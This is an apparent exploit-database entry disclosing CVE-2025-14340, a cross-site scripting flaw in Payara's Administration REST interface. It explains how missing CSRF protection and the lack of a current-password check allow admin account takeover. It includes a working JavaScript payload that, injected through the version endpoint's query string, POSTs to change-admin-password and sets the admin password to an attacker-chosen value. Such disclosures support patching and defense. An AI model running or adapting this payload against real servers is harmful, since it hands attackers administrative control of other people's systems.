Share
## https://sploitus.com/exploit?id=PACKETSTORM:217734
# XSS to Admin account takeover (CVE-2025-14340)
    
    A Cross-Site Scripting vulnerability in Payaraโ€™s Administration Rest Interface, allows execution
    of attacker-controlled JavaScript leading to admin account take over. Because of:
    
    1. The panel uses HTTP Basic Auth (credentials are sent automatically by the browser for same-origin requests).
    2. The change-admin-password endpoint does not require the current password to update a userโ€™s password.
    3. The change-admin-password form does not have CSRF protection.
    4. An injected script using the XSS in `/management/domain/version` can POST to `/management/domain/change-admin-password` and set an attacker-chosen password for any target account โ€” resulting in administrator account takeover.
    
    #### Proof of Concept
    
    URL:
    
    `https://panel.example.com:4848/management/domain/version?<PAYLOAD>`
    
    PAYLOAD:
    
    ```
    <script>
    fetch('/management/domain/change-admin-password', {
     method: 'POST',
     headers: {
     'X-Requested-By': 'GlassFish REST HTML interface',
     'Accept': 'text/html',
     'Content-Type': 'application/x-www-form-urlencoded'
     },
     body:
    'id=admin&newpassword=P1234&password=P1234&__remove_empty_entries__=true&=chang
    e-admin-password'
    });
    </script>
    ```
    
    ## Legal
    
    AUTHORIZED USE ONLY. DeepSecurity Perรบ does not endorse unauthorized access and takes no responsibility for any misuse of the information provided.